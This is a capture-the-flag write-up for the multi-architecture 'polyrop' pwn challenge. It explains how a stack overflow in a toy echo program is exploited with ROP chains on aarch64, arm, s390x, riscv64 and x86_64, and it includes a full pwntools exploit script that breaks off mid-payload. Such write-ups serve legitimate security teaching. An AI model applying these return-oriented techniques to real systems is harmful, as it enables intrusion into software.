I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time
and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.
Category: pwn
Solver: nh1729
Flag: GPNCTF{you_re_lucky_that_i_scr4pped_one_arch_11dda4}
Writeup
Challenge Setup
This is the hard version of polyrop-warmup. To summarize:
It is a binary exploitation challenge. We get the source of the program to pwn, composer.c, and a Python wrapper, composer.py. The program prints a menu to either echo back a line or exit.
The program has been compiled for 5 different architectures: s390x, aarch64, arm, riscv64 and x86_64.
$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
Arch: aarch64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-arm'
Arch: arm-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-riscv64'
Arch: riscv64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-s390x'
Arch: em_s390-64-big
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-x86_64'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
The wrapper starts a QEMU instance with the executable for each architecture under a different user. Every line we send is multiplexed to each of these processes. The wrapper then waits for all processes to output something, prints these outputs and accepts new input.
QEMU loads all binaries except the one for aarch64 at static addresses, despite them being PIE.
The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.
Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us.
In contrast to polyrop-warmup, there is no win function. We have to do proper ROP this time.
Recall there is a buffer overflow in the function that echoes back a user provided line:
static void add_composer(void) {
    char buf[0x20];
    puts("enter composer:");
    int i = 0, c;
    while ((c = xgetchar()) != '\n') {
        buf[i++] = c;
    }
    fputs("composer: ", stdout);
    puts(buf);
    // TODO: add composer to db
}
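The while loop behaves almost exactly like the unsafe gets function, except that xgetchar is a custom function that exits on EOF. Since i is never checked against the 0x20 bytes of buf, a longer line overwrites the stack beyond the buffer.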
Solution
We started with our exploit for polyrop-warmup.
Since we need to build proper ROP chains this time, we debug each architecture individually. For that, we patch the list of architectures in composer.py and in our exploit to include only one, and enable gdb debugging in composer.py.
We can now debug the architecture by running gdb-multiarch with the command
target remote localhost:1234
The first architecture we tackled was aarch64.
aarch64
Architecture basics: This architecture keeps the return address not on the stack but in the link register x30. It is saved on the stack only if a function calls other functions and thus has to overwrite x30. The stack pointer is the dedicated register sp, while x29 serves as the frame pointer.
First, we automatically search for gadgets and dump all assembly with
ROPgadget --binary composer-aarch64 --offset 0x100000 > gadgets-aarch64.txt # offset is the one Ghidra uses
aarch64-linux-gnu-objdump -d composer-aarch64 > disassembly-aarch64.txt # more searchable than Ghidra
The objdump command is from the binutils-aarch64-linux-gnu package.
We can see that the binary is statically linked against musl as its libc. We therefore did not need to leak further addresses to find juicy gadgets there. Instead, we looked for somewhat high-level ones to increase the chances of reuse on other architectures.
To read from file descriptor 42, our first attempt was to use add_composer by pointing the address it writes to at the file descriptor field of the stdin struct. After that, we could input the byte 42 ('*') to change the file descriptor. Subsequently, the function would read the token from the new file descriptor.
First, we needed to leak the address of the binary. This is only required for aarch64, because it is the only binary that QEMU does not load at a static address. Easy enough, we copied that from our exploit for polyrop-warmup.
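The leak relies on puts printing past the unterminated buffer. A minimal sketch of the parsing step, assuming the echoed line has the form 'composer: ' + 0x28 filler bytes + leaked pointer bytes + newline. The helper names parse_leak and rebase are ours, the response is simulated, and the two reference addresses are the ones we observed in one debugging session:

```python
PREFIX = b'composer: '
PAD = 0x28  # filler bytes sent before the leaked pointer

def parse_leak(line: bytes) -> int:
    """Extract the little-endian pointer that puts() printed after the filler."""
    raw = line[len(PREFIX) + PAD:-1]  # drop prefix, filler and trailing newline
    return int.from_bytes(raw, 'little')

def rebase(leak: int, leak_ref: int, target_ref: int) -> int:
    """Translate an address from a reference run to the current run."""
    return leak - leak_ref + target_ref

# Simulated response for illustration only (not real program output).
# puts() stops at the first NUL, so only the 6 non-zero pointer bytes appear.
fake_ptr = 0x7f112a8b6d44
line = PREFIX + b'A' * PAD + fake_ptr.to_bytes(6, 'little') + b'\n'
leak = parse_leak(line)
main_addr = rebase(leak, 0x7f112a8b6d44, 0x7f112a8b69e4)
```

The same rebase arithmetic works for any symbol once a single pointer into the binary is known, because all offsets inside the image stay constant.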
This approach failed, however, because add_composer calls exit on EOF. We could thus not return to any gadget to print the data.
The next approach was to use other gadgets to change the file descriptor and read from it as discrete operations.
Using some regexes on the output of ROPgadget, we found these gadgets:
# loads w0 and x19 from the stack
<__uflow + 0x34>: ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
# stores the value of w0 to an address relative to x19
<__do_global_dtors_aux + 0x50>: strb w0, [x19, #1072]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #32; ret
To find the required offsets for the registers and the next return addresses, we ran the program with the payload filled with a cyclic pattern (the default filler), stepped through the execution until we reached the gadgets and, just like with the return addresses, got the offsets by looking up the register values in the cyclic pattern.
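The offset lookup can be illustrated without pwntools. The sketch below is a simplified stand-in for cyclic and cyclic_find: it does not generate the de Bruijn sequence that pwntools uses, it merely makes every aligned 4-byte chunk distinct, which is enough for values loaded from aligned stack slots. The function names are ours.

```python
import string

def make_pattern(length: int, width: int = 4) -> bytes:
    """Build a filler whose aligned `width`-byte chunks are all distinct."""
    alphabet = string.ascii_lowercase.encode()
    out = bytearray()
    index = 0
    while len(out) < length:
        n, chunk = index, bytearray()
        for _ in range(width):  # write `index` in base 26 using lowercase letters
            chunk.append(alphabet[n % 26])
            n //= 26
        out += chunk
        index += 1
    return bytes(out[:length])

def find_offset(pattern: bytes, value: int, width: int = 4) -> int:
    """Return the aligned offset whose chunk equals the low bytes of `value`."""
    needle = (value & ((1 << (8 * width)) - 1)).to_bytes(width, 'little')
    for off in range(0, len(pattern) - width + 1, width):
        if pattern[off:off + width] == needle:
            return off
    return -1

pattern = make_pattern(0x500)
# Pretend the debugger showed this value in x19 after the gadget ran.
observed_x19 = int.from_bytes(pattern[0x70:0x78], 'little')
offset = find_offset(pattern, observed_x19)
```

Because the pattern only contains lowercase letters, it never contains a newline and therefore survives the line-based input loop.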
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
# pwndbg> p &__stdin_FILE.fd
# $3 = (int *) 0x7f112a8d82c0 <__stdin_FILE+120>
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
aarch_rop_offset+0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19
}, length=0x500, word_size=64, endian='little', filler=cyclic())
With print __stdin_FILE, we confirmed the fd was changed.
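For readers unfamiliar with pwntools: the dictionary passed to flat maps payload offsets to the values placed there. The following stand-in shows the idea with the standard library only. It is our own simplified helper named place, not the pwntools implementation, and the addresses in the example are hypothetical.

```python
import struct

def place(layout: dict, length: int, filler: bytes = b'\0') -> bytes:
    """Write each value at its offset; ints are packed as 64-bit little-endian."""
    buf = bytearray(filler * length)[:length]
    for offset, value in layout.items():
        data = struct.pack('<Q', value) if isinstance(value, int) else bytes(value)
        if offset + len(data) > length:
            raise ValueError(f'value at {offset:#x} does not fit')
        buf[offset:offset + len(data)] = data
    return bytes(buf)

# Hypothetical addresses, for illustration only.
demo = place({
    0x28: 0x4000001234,        # return address slot
    0x60 + 0x2f: bytes([42]),  # single byte later loaded into w0
    0x70: 0x4000005678,        # value later loaded into x19
}, length=0x100)
```

Writing the offset as 0x60+0x2f keeps the gadget's own displacement ([sp, #47]) visible next to the stack position at which the gadget runs.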
We cannot use add_composer to read from that file descriptor because it would exit again.
Therefore we tried to find gadgets to explicitly call getchar and store the result in some buffer to print later.
Unfortunately, getchar on this architecture does not seem to store its return address on the stack.
If we return to it by setting register x30, the ret of the function will jump back to its top, trapping us in an infinite loop of getchar with no option to output our precious tokens.
We would like to have a gadget that does a proper function call to a register address instead, so that it sets up x30 properly. Searching for these with the regex \tb.*\tx, we found an even better one:
// __libc_start_init + 0x2c
// Start of interesting bit
ldr x0, [x19], #8
blr x0
cmp x19, x20
b.cc 10cf0 // Jump to start of this gadget
// End of interesting bit
ldp x19, x20, [sp, #16]
ldp x29, x30, [sp], #32
ret
The interesting bit loops from x19 to x20 and calls each address in that array as a function.
This is extremely interesting, as we know we can set up x19 easily (and x20 is not much harder).
This single gadget lets us build a “ROP” chain that does not actually use the return address register x30 to set up the gadgets.
Instead, we can simply create an array of addresses to be called. Some of these functions would be getchar, while others would store the return value in w0 to a chosen buffer.
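To make the control flow of this gadget concrete, here is a small model of the loop in Python. It is only a simulation under simplifying assumptions: memory is a dictionary of 8-byte slots, the called functions are Python callables that always return, and all addresses are hypothetical.

```python
def run_function_array(memory: dict, x19: int, x20: int, functions: dict) -> list:
    """Model of: ldr x0, [x19], #8; blr x0; cmp x19, x20; b.cc loop."""
    called = []
    while True:
        x0 = memory[x19]                 # ldr x0, [x19], #8: load, then post-increment
        x19 += 8
        called.append(functions[x0]())   # blr x0 sets x30, so the callee returns here
        if not x19 < x20:                # b.cc repeats while x19 < x20 (unsigned)
            break
    return called

# Hypothetical addresses standing in for getchar and the puts call in main.
GETCHAR, PUTS_IN_MAIN = 0x1000, 0x2000
array_base = 0x7ff200
memory = {array_base: GETCHAR, array_base + 8: PUTS_IN_MAIN}
functions = {GETCHAR: lambda: 'getchar', PUTS_IN_MAIN: lambda: 'puts'}
order = run_function_array(memory, array_base, array_base + 0x10, functions)
```

Note that the loop body runs before the comparison, so the first entry is always called, and x20 only has to point just past the last entry.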
While searching for such a store gadget, we realized it might not be necessary at all because the characters read by getchar would also appear in the input buffer of __stdin_FILE.
# Address start of payload
aarch_stack_base = 0x4000007ff150 # Empirical
aarch_array_offset = 0xb0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
# Fetch token and print it.
0x68: aarch_exe.symbols['main'] - 0x44, # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset, # value for x19: start of list of functions
0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10, # value for x20: end of list of functions
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [aarch_exe.symbols['getchar']] * 16, # functions to execute: read token
}, length=0x500, word_size=64, endian='little', filler=cyclic())
Stepping through the exploit, we found that the first getchar already reads the entire token into __stdin_FILE.buf. We therefore do not need to call it 16 times.
Although at this point it would be fine and safer to make 16 calls, doing so bloats our payload with a large chunk of occupied offsets. That could complicate things further down the line, when all payloads must be non-overlapping so that we can combine them into the final payload. So one getchar it is.
The next step is to print __stdin_FILE.buf. Luckily, we found a gadget in main that calls puts on the buffer in register x22:
// main+0xa8
mov x0, x22
b 10a5c <main+0x78>
// instruction after jump:
bl 11718 <puts>
main restores x22 from the stack when returning, giving us full control over it.
The entire exploit for aarch64 is this:
from pwn import *
from ast import literal_eval
archs = ["aarch64"]
r = process('python ./composer.py', shell=True)
def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result: bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out
read_response(r)
r.sendline(b'1')
read_response(r)
r.sendline(b'A' * 0x28)
A = read_response(r)
aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
# Address start of payload
aarch_stack_base = 0x4000007ff150 # Empirical
aarch_array_offset = 0xb0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19 (anonymous function)
# Fetch token
0xa0: aarch_stack_base + aarch_array_offset, # value for x19: start of list of functions
0x50: aarch_stack_base + aarch_array_offset + 0x10, # value for x20: end of list of functions
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin.
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [aarch_exe.symbols['getchar'], aarch_exe.symbols['main'] + 0xa8], # functions to execute: prefetch token, go to main for puts
}, length=0x500, word_size=64, endian='little', filler=cyclic())
assert b'\n' not in payload
# send payload
r.sendline(b'1')
read_response(r)
r.sendline(payload)
read_response(r)
# return from main to trigger chain
r.sendline(b'2')
r.interactive()
We can see the token is being printed, together with more garbage from the payload that is still in the buffer.
$ python aarch64_wu.py
[+] Starting local process '/bin/sh': pid 1284212
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
Arch: aarch64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
aarch64: b'e4e4da8d190bb079kaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaam\n'
Other architectures
Once we had one payload figured out, the others were a lot easier as many similar gadgets are available in the same functions. In this section, we only point out notable features, techniques and gadgets for these architectures and do not cover every detail again. You’ll see in the final exploit script that there is a lot of approximate repetition.
On all architectures, our strategy is to change __stdin_FILE.fd, call getchar and print __stdin_FILE.buf. Since the payloads are conceptually all the same, we only list them in the final, complete exploit script.
ARM
For arm, ROPgadget found only 61 gadgets, so the disassembly from objdump was much more useful.
Unlike aarch64, arm pops the return address from the stack. The syntax is slightly unusual as it uses a single instruction, ldmia.w, to pop many registers at the end of a function, including the program counter as if it were a regular register.
This is the return instruction at the end of main:
pop {r4, r5, r6, r7, r8, r9, fp, pc}
Working on this architecture, we found this gadget to set the fd, where ld* loads from an address with an offset and st* stores to one:
// __fwritex+0x70
ldr r3, [r5, #20]
add r3, r4
str r3, [r5, #20]
ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
Not only does it change a value relative to r5 by r4, it also gives us an ldmia to set both of them! In the end, we had them set by the return of main, but this gadget is still really powerful as the function is likely to use callee-saved registers on other architectures too.
The remainder of the payload for arm is almost identical to that of aarch64. We again used libc_start_init to call getchar and a puts from main, although classical ROP could have been sufficient as the return address is on the stack.
s390x
ROPgadget and Ghidra do not support s390x, but objdump works fine. The return address is in register r14 and the stack pointer in r15; all numbers are big endian. The return address is not always put on the stack. Other than that, we pretty much used the same gadgets as on arm.
Popping from the stack is really cursed on this architecture. Most functions use lmg (LOAD MULTIPLE) at the end. The manual explains that this instruction loads every register in the range from the first operand to the second from consecutive 8-byte memory slots, starting at the address given by the last operand. It took us some attempts to understand this, so here is an example:
lmg %r12,%r15,288(%r15)
// This instruction effectively means:
r12 = *(r15+288+8*0)
r13 = *(r15+288+8*1)
r14 = *(r15+288+8*2)
r15 = *(r15+288+8*3)
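The same semantics as a small executable model, in case the pseudo-C above is still ambiguous. This is a sketch under simplifying assumptions: memory is a flat bytes object starting at address 0, the register file is a dictionary, and the wrap-around from r15 to r0 that the real instruction performs when the first register number is larger than the last is not modeled.

```python
def lmg(regs: dict, memory: bytes, first: int, last: int, disp: int, base: int) -> None:
    """Load registers first..last from consecutive big-endian 8-byte slots."""
    addr = regs[base] + disp  # the address is computed before any register changes
    for n, reg in enumerate(range(first, last + 1)):
        slot = memory[addr + 8 * n: addr + 8 * n + 8]
        regs[reg] = int.from_bytes(slot, 'big')

# Toy memory: a fake stack starting at address 0, values chosen for illustration.
values = [0x1111, 0x2222, 0x3333, 0x400]
memory = bytes(288) + b''.join(v.to_bytes(8, 'big') for v in values)
regs = {15: 0}
lmg(regs, memory, 12, 15, 288, 15)  # lmg %r12,%r15,288(%r15)
```

The important detail for exploitation is the last slot: because r15 is part of the loaded range, the instruction replaces the stack pointer with an attacker-controlled value, which acts as a stack pivot.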
The only notable differences in gadgets compared to arm are that, for the gadget in __fwritex, we only use the store part because we can control the value to be stored directly, and that we set up the first argument register directly and return to puts as the second element of the array of functions.
RISCv64
The return address is stored on the stack. The gadgets are the same as on arm.
X86_64
We are comfortable enough with this architecture to pop registers rax and rbx directly and use a simple mov %eax,0x20(%rbx); add $0x10,%rsp; pop %rbx; ret to set fd, and to use only stack-based return addresses to call all other essential gadgets, without need for the libc_start_init array.
Putting it all together
Now that we had five payloads that worked on their respective architecture, we still had to combine them into a single payload to solve all at the same time.
Since the ROP chains must not overlap for that purpose, we chose simple gadgets that add some value to the stack pointer or, in the case of s390x, pop it directly, to move the actual payload further back for each architecture until it no longer collides with the other payloads.
These shifts are the ${ARCH}_rop_offset variables in the exploit below.
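A rough sketch of how such shift chains can be laid out and checked against each other before the real payloads exist. The slot positions, strides and jump counts are the ones from our aarch64 and arm payloads. The gadget addresses are placeholders, the helper names are ours, and the range-based check is a simplification of the byte-wise check our merge code performs.

```python
def shift_slots(first_slot: int, stride: int, jumps: int, gadget: int) -> dict:
    """Return-address slots that make the chain skip `jumps` frames of `stride` bytes."""
    return {first_slot + stride * i: gadget for i in range(jumps)}

def used_ranges(layout: dict, word: int) -> list:
    """Byte ranges occupied by a layout of word-sized values."""
    return sorted((off, off + word) for off in layout)

def overlaps(a: list, b: list) -> bool:
    """True if any byte range in `a` intersects one in `b`."""
    return any(s1 < e2 and s2 < e1 for s1, e1 in a for s2, e2 in b)

# Placeholder gadget addresses; only the offsets matter here.
aarch64 = shift_slots(0x28, 0x60, 7, gadget=0xAAAA)
arm = shift_slots(0x3c, 0xc8, 3, gadget=0xBBBB)
aarch64_rop_offset = 0x60 * 7  # where the real aarch64 chain starts
clash = overlaps(used_ranges(aarch64, 8), used_ranges(arm, 4))
```

Increasing the number of jumps for one architecture moves its real chain further back without touching the others, which is how we resolved collisions by trial and error.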
We used this snippet to merge the payloads, gather tokens and find the flag. We fill the finished payloads with null bytes and consider a byte relevant to a payload if it is not null.
##########################
##### Merge Payloads #####
##########################
payloads = [
('arm', payload_arm),
('aarch64', payload_aarch64),
('riscv', payload_riscv),
('x86_64', payload_x86_64),
('s390x', payload_s390x),
]
def key(name_payload):
    return len(name_payload[1])
maxlen = key(max(payloads, key=key))
for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'
merged_payload = [0] * maxlen
for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]
for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))
merged_payload = bytes(merged_payload)
###################
##### Exploit #####
###################
r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')
tokens_raw = read_response(r)
for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')
r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])
r.interactive()
One final hiccup was that on the remote, the stack pointers are randomized while they were constant on local. We fixed that by extending our leaks at the beginning of the exploits.
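The extended leak recovers stack bytes one at a time: with i filler bytes, puts prints whatever follows them up to the first NUL, so the byte at offset i is either visible or, if the newline follows immediately, must have been NUL. Below is a self-contained simulation of that idea. The echo function is our model of the program's behaviour rather than real output, and the stack contents are made up.

```python
PREFIX = b'composer: '

def echo(stack: bytes, n: int) -> bytes:
    """Model of add_composer: n filler bytes overwrite the stack, puts prints up to the first NUL."""
    mem = b'A' * n + stack[n:]
    return PREFIX + mem.split(b'\0', 1)[0] + b'\n'

def leak_range(stack: bytes, start: int, stop: int) -> bytes:
    """Recover stack[start:stop] with one round trip per byte."""
    out = b''
    for i in range(start, stop):
        byte = echo(stack, i)[len(PREFIX) + i:][:1]
        out += b'\0' if byte == b'\n' else byte  # newline right after the filler means NUL
    return out

# Toy stack: 0x20 buffer bytes followed by a pointer with NUL bytes inside.
secret = (0x4000007ff1b0).to_bytes(8, 'little')
stack = bytes(0x20) + secret + bytes(8)
recovered = leak_range(stack, 0x20, 0x28)
```

One limitation of this approach is that a genuine 0x0a byte on the stack is indistinguishable from NUL, so a leaked value containing it would be reconstructed incorrectly.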
Useful resources
Exploit
from pwn import *
from ast import literal_eval
archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = remote("imagine--john-lennon-5061.ctf.kitctf.de", "443", ssl=True)
def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result: bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out
######### Begin Leak test
# Leak test
# print(read_response(r))
# for i in range(0x10, 0x70, 4):
# print(f'##### {i=:x} #####')
# r.sendline(b'1')
# read_response(r)
# r.sendline(b'A' * i)
# print(read_response(r)['s390x'])
# r.interactive()
######### End Leak test
leaks = {a: bytes(0x20) for a in archs}
len_composer = len(b'composer: ')
read_response(r)
with log.progress("Leaking bytes") as prog:
    for i in range(0x20, 0x70):
        prog.status(f'{i=} / {0x70}')
        r.sendline(b'1')
        read_response(r)
        r.sendline(b'A' * i)
        leaks_ = read_response(r)
        for arch, leak in leaks_.items():
            leak_byte = leak[len_composer+i:][:1]
            if leak_byte == b'\n':
                leaks[arch] += b'\0'
            else:
                leaks[arch] += leak_byte
s390x_stack_base = int.from_bytes(leaks['s390x'][0x68:0x68 + 8].rstrip(b'\n'), 'big') - 0x210
aarch_stack_base = int.from_bytes(leaks['aarch64'][0x20:0x20 + 8].rstrip(b'\n'), 'little') - 0x60
arm_stack_base = int.from_bytes(leaks['arm'][0x24:0x24 + 4].rstrip(b'\n'), 'little') - 0x74
riscv64_stack_base = int.from_bytes(leaks['riscv64'][0x58: 0x58 + 8].rstrip(b'\n'), 'little') - 0xb0
# We do not need a leak for x86_64
success(f'{s390x_stack_base:=x}, {aarch_stack_base:=x}, {arm_stack_base:=x}, {riscv64_stack_base:=x}')
###################
##### AARCH64 #####
###################
aarch_leak = int.from_bytes(leaks['aarch64'][0x28:0x30], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
aarch_offset_jumps = 7
aarch_rop_offset = 0x60 * aarch_offset_jumps
# Offset of function array from buffer start
aarch_array_offset = 0xb0
payload_aarch64 = flat({
# gdb: b *main+0xfc
# add 0x60 to sp per iteration
**{
0x28 + 0x60 * i: aarch_exe.sym['main'] + 0xe4 for i in range(aarch_offset_jumps)
},
aarch_rop_offset: {
# Change fd of stdin to 42
# ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
0x28: aarch_exe.sym['__uflow'] + 0x34,
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
# Fetch token and puts it.
# strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
0x68: aarch_exe.symbols['main'] - 0x44,
# value for x19: start of list of functions
0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset,
# value for x20: end of list of functions
0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10,
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [
aarch_exe.symbols['getchar'], # prefetch token
aarch_exe.symbols['main'] + 0xa8, # puts( x22 )
],
}
}, word_size=64, endian='little', filler=b'\0')
###############
##### ARM #####
###############
arm_exe = ELF('./composer-arm')
arm_exe.address = 0x400000
arm_array_offset = 0x0
arm_stdin_fd = 0x431d6c
arm_stdin_buf = 0x431fac
arm_offset_jumps = 3
arm_rop_offset = 0xc8 * arm_offset_jumps
payload_arm = flat({
# gdb: b *main+0xdc
**{
0x3c + 0xc8 * i: arm_exe.sym['__init_libc'] + 0x11e for i in range(arm_offset_jumps)
},
arm_rop_offset: {
0x2c: 42, # R4
0x30: arm_stdin_fd - 0x14, # R5
# 0x28: 0, # R6
# 0x2c: 0, # R7
# 0x30: 0, # R8
# 0x34: 0, # R9
# 0x38: 0, # R11
# pc # ldr r3, [r5, #20]; add r3, r4; str r3, [r5, #20]; ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
0x3c: arm_exe.sym['__fwritex'] + 0x70,
0x40: arm_rop_offset + arm_array_offset + arm_stack_base, # R4, start of function array
0x44: arm_rop_offset + arm_array_offset + arm_stack_base + 4 * 2, # R5, end of function array
# 0x48: 0, # R6
# 0x4c: 0, # R7
0x50: arm_stdin_buf, # R8, stdin buffer
0x54: arm_exe.sym['libc_start_init'] + 0x14, # pc # call function array
arm_array_offset: [
arm_exe.sym['getchar'], # prefetch token
arm_exe.sym['main'] + 0xa4, # puts( R8 )
],
},
}, word_size=32, endian='little', filler=b'\0')
##################
##### x86_64 #####
##################
x86_64_exe = ELF('./composer-x86_64')
x86_64_exe.address = 0x555555556000
x86_64_stdin_fd = 0x55555555ab78
x86_64_stdin_buf = 0x55555555ab78
x86_64_offset_jumps = 3
x86_64_rop_offset = 0x160 * x86_64_offset_jumps
pop_rax = x86_64_exe.sym['_init'] + 1
pop_rbx = x86_64_exe.sym['__init_tp'] + 0x78
# 0x0000000000101e14 : mov dword ptr [rbx + 0x20], eax ; add rsp, 0x10 ; pop rbx ; ret
mov_gadget = x86_64_exe.sym['static_init_tls'] + 0x1cd
payload_x86_64 = flat({
# gdb: b *main + 0xe7
**{
# add rsp, 0x158 ; ret
0x58 + 0x160 * i: x86_64_exe.sym['__init_libc'] + 0x199 for i in range(x86_64_offset_jumps)
},
0x48: 0x55555555afa8, # r15: stdin buffer
x86_64_rop_offset + 0x58: [
pop_rax,
42, # RAX
pop_rbx,
x86_64_stdin_fd - 0x20, # rbx
mov_gadget,
0, 0, # add rsp, 0x10
0, # RBX
x86_64_exe.sym['getchar'],
x86_64_exe.sym['main'] + 0x63, # mov rdi, r15; call puts
]
}, word_size=64, endian='little', filler=b'\0')
#################
##### s390x #####
#################
s390x_exe = ELF('./composer-s390x')
s390x_exe.address = 0x2aa00000000
s390x_stdin_fd = 0x2aa00004090
s390x_stdin_buf = 0x2aa000042c0
s390x_rop_offset = 0x380
payload_s390x = flat({
# gdb: b *main+0x8c
# R14, pop registers # lmg %r9,%r15,232(%r15); br %r14
0x90: s390x_exe.sym['__libc_start_init'] + 0x96,
0x98: s390x_stack_base + s390x_rop_offset - 0xe8, # R15, saved stack pointer
s390x_rop_offset: {
0x8: s390x_stdin_fd - 40 - 4, # R10
0x10: 42, # R11
# R14 # stg %r11,40(%r10); lmg %r8,%r15,224(%r15); br %r14
0x28: s390x_exe.sym['__fwritex'] + 0x122,
# R15, offsets are such that payload is compact
0x30: s390x_stack_base + s390x_rop_offset - 0x80,
0x60: s390x_stdin_buf, # R8
0x70: s390x_stack_base-0x100, # R10, needs to be read/writeable for this gadget
0x78: s390x_stack_base + s390x_rop_offset + 0xb0, # R11, begin of function array
0x90: s390x_exe.sym['__libc_start_init'] + 0x6c, # R14, call function array
0x98: s390x_stack_base + s390x_rop_offset + 0xb0 - 0xf0, # R15 (stack pointer)
0xb0: [
s390x_exe.sym['getchar'],
s390x_exe.sym['__fwritex'] + 0x118,
],
0xd0: s390x_exe.sym['puts'], # R14
0xd8: s390x_stack_base + s390x_rop_offset, # R15
},
}, word_size=64, endian='big', filler=b'\0')
###################
##### riscv64 #####
###################
riscv64_exe = ELF('./composer-riscv64')
riscv64_exe.address = 0x555555556000
riscv64_stdin_fd = 0x555555559090
riscv64_stdin_buf = 0x555555559368
riscv64_array_offset = 0xb0
riscv64_offset_jumps = 3
riscv64_rop_offset = 0x80 * riscv64_offset_jumps
payload_riscv = flat({
# gdb: b *main+0xe8
**{
# addi sp,sp,128; ret
0x70 + 0x80 * i: riscv64_exe.sym['main'] + 0xce for i in range(riscv64_offset_jumps)
},
riscv64_rop_offset: {
# 0x20: 0, # s9
# 0x28: 0, # s8
# 0x30: 0, # s7
# 0x38: 0, # s6
0x40: riscv64_stdin_buf, # s5, buffer for puts
# 0x48: 0, # s4
# 0x50: 0, # s3
